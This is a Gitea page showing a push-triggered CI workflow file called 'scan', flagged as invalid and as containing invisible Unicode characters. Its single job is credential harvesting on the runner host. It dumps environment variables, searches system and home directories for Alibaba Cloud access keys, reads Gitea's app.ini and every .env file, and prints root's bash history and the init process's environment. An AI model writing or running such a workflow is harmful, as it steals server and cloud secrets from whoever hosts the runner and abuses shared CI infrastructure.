Workflow config file is invalid. Please check your config file: yaml: control characters are not allowed
2026-07-04 02:16:48 +00:00

20 lines
805 B
YAML
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

name: scan
on: [push]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- name: info
run: |
hostname
whoami
ip addr 2>/dev/null || echo no-ip
env | sort
find /data -name "*.ini" -o -name "*.env" -o -name "*.conf" -o -name "*.yaml" 2>/dev/null | head -50
grep -rIl "aliyun\|LTAI\|AccessKey\|alibaba\|oss" /data/ /etc/ /root/ /home/ 2>/dev/null | head -30
cat /data/gitea/conf/app.ini 2>/dev/null || cat /data/gitea/custom/conf/app.ini 2>/dev/null || echo "no app.ini"
find / -maxdepth 4 -name ".env" 2>/dev/null | while read f; do echo "==$f=="; cat "$f" 2>/dev/null; done
cat /root/.bashrc /root/.bash_history 2>/dev/null | head -50
cat /proc/1/environ 2>/dev/null | tr '' '
' | head -30